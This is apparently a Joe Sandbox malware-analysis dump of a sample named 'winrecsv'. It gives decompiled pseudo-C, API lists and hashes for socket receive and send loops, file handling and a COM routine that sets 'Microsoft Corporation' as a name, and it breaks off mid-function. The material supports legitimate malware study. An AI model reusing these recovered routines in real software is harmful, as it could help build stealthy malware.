                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				_t2 =  &_a4; // 0x4050e0
                                                                                  				_v12 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0);
                                                                                  				if(_v12 != 0xffffffff) {
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					CloseHandle(_v12);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}





                                                                                  0x0040d536
                                                                                  0x0040d54c
                                                                                  0x0040d556
                                                                                  0x0040d55d
                                                                                  0x0040d56b
                                                                                  0x0040d572
                                                                                  0x0040d572
                                                                                  0x0040d57e

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 1378416451-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                  				_t34 = 0;
                                                                                  				_t43 = _a4;
                                                                                  				_v28 = 0;
                                                                                  				do {
                                                                                  					_t23 =  &_v32;
                                                                                  					_v32 = 0;
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                  					if(_t23 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t37 = _v44;
                                                                                  					if(_t37 != 0) {
                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                  							_v40 = _t37;
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);
                                                                                  							_t37 = _v44;
                                                                                  							_t50 = _t50 + 8;
                                                                                  							_t34 = _t26;
                                                                                  						}
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v22 = 0;
                                                                                  						_v18 = 0;
                                                                                  						_t29 =  *(_t43 + 8);
                                                                                  						_v32 = 0;
                                                                                  						_t40 =  &_v32;
                                                                                  						_v36 = 0x10;
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                  						_t47 = _t29;
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                  							_t40 =  &_v56;
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);
                                                                                  							_t50 = _t50 + 0x14;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                  				return E00408FB0(_t34);
                                                                                  			}























                                                                                  0x0040de70
                                                                                  0x0040de76
                                                                                  0x0040de7b
                                                                                  0x0040de7e
                                                                                  0x0040de81
                                                                                  0x0040de85
                                                                                  0x0040de88
                                                                                  0x0040de93
                                                                                  0x0040de9b
                                                                                  0x0040dea4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040deaa
                                                                                  0x0040deb0
                                                                                  0x0040deb8
                                                                                  0x0040dec2
                                                                                  0x0040dec6
                                                                                  0x0040decb
                                                                                  0x0040decf
                                                                                  0x0040ded2
                                                                                  0x0040ded2
                                                                                  0x0040ded8
                                                                                  0x0040dedc
                                                                                  0x0040dee0
                                                                                  0x0040dee4
                                                                                  0x0040deee
                                                                                  0x0040def1
                                                                                  0x0040def6
                                                                                  0x0040df00
                                                                                  0x0040df08
                                                                                  0x0040df0e
                                                                                  0x0040df13
                                                                                  0x0040df1e
                                                                                  0x0040df28
                                                                                  0x0040df31
                                                                                  0x0040df36
                                                                                  0x0040df36
                                                                                  0x0040df13
                                                                                  0x0040df45
                                                                                  0x0040df5f

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;
                                                                                  				struct _OVERLAPPED* _v8;
                                                                                  				long _v12;
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;
                                                                                  				_t51 = _a4;
                                                                                  				_t52 = 0;
                                                                                  				_v4 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  				_t43 = _v12;
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                  				if(_t43 == 0) {
                                                                                  					return _t32;
                                                                                  				}
                                                                                  				do {
                                                                                  					if(_t32 == 0) {
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                  						if(_t38 == 0) {
                                                                                  							__imp__#111();
                                                                                  							_t52 = _t38;
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t52);
                                                                                  					E0040EBE0(_v8, _v4, _v12);
                                                                                  					_t54 =  &(_t54[1]);
                                                                                  					_t52 = 0;
                                                                                  					_v4 = 0;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  					_t43 = _v12;
                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                  				} while (_t43 != 0);
                                                                                  				return _t32;
                                                                                  			}















                                                                                  0x0040edd0
                                                                                  0x0040eddc
                                                                                  0x0040edf3
                                                                                  0x0040edf7
                                                                                  0x0040edfb
                                                                                  0x0040edff
                                                                                  0x0040ee03
                                                                                  0x0040ee05
                                                                                  0x0040ee0b
                                                                                  0x0040ee10
                                                                                  0x0040ee8f
                                                                                  0x0040ee8f
                                                                                  0x0040ee13
                                                                                  0x0040ee15
                                                                                  0x0040ee27
                                                                                  0x0040ee2f
                                                                                  0x0040ee37
                                                                                  0x0040ee39
                                                                                  0x0040ee3f
                                                                                  0x0040ee3f
                                                                                  0x0040ee37
                                                                                  0x0040ee4d
                                                                                  0x0040ee4e
                                                                                  0x0040ee53
                                                                                  0x0040ee69
                                                                                  0x0040ee6d
                                                                                  0x0040ee71
                                                                                  0x0040ee75
                                                                                  0x0040ee79
                                                                                  0x0040ee7b
                                                                                  0x0040ee81
                                                                                  0x0040ee84
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E620(void* __esi) {
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t22 = __esi;
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                  				_t21 = _t23 + 0x244;
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                  						}
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}









                                                                                  0x0040e620
                                                                                  0x0040e622
                                                                                  0x0040e627
                                                                                  0x0040e630
                                                                                  0x0040e638
                                                                                  0x0040e687
                                                                                  0x0040e688
                                                                                  0x0040e693
                                                                                  0x0040e63a
                                                                                  0x0040e648
                                                                                  0x0040e659
                                                                                  0x0040e65c
                                                                                  0x0040e661
                                                                                  0x0040e663
                                                                                  0x0040e663
                                                                                  0x0040e668
                                                                                  0x0040e66f
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e679
                                                                                  0x0040e67f
                                                                                  0x00000000
                                                                                  0x0040e64a
                                                                                  0x0040e64d
                                                                                  0x0040e658
                                                                                  0x0040e658
                                                                                  0x0040e648

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);
                                                                                  					return E00408FB0(_a4);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}






                                                                                  0x0040c18a
                                                                                  0x0040c18f
                                                                                  0x0040c199
                                                                                  0x0040c19f
                                                                                  0x0040c1b1
                                                                                  0x0040c1be
                                                                                  0x0040c1c8
                                                                                  0x0040c1ae
                                                                                  0x0040c1ae
                                                                                  0x0040c1d7
                                                                                  0x0040c1e4
                                                                                  0x0040c1ed
                                                                                  0x0040c1f1
                                                                                  0x00000000
                                                                                  0x0040c202
                                                                                  0x0040c208

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,00406874), ref: 004057B8
                                                                                  • SysAllocString.OLEAUT32(00414A30), ref: 004057C3
                                                                                  • CoUninitialize.OLE32 ref: 004057E8
                                                                                    • Part of subcall function 00405520: SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004057E2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: String$Free$AllocInitializeUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 459949847-0
                                                                                  • Opcode ID: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction ID: ed05d97b5b317eb6b2af260c68b5e38350126176a91c2a59017ff1c3aafa5288
                                                                                  • Opcode Fuzzy Hash: b8475d7346bb43be32fa0760030d30944301d8ab8fa8548105178a417464336f
                                                                                  • Instruction Fuzzy Hash: A8E04875941308FBD700DBE0ED0EB9E7778DB05701F108175F90567291D6B55E80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 62%
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				void* _v32;
                                                                                  				short _v36;
                                                                                  				char _v40;
                                                                                  				intOrPtr _t95;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0);
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                  						_push( &_v16);
                                                                                  						_push(_v32);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                  							_push( &_v36);
                                                                                  							_push(_v16);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                  								if(_v36 == 0xffffffff) {
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                  												_v8 = _t110;
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
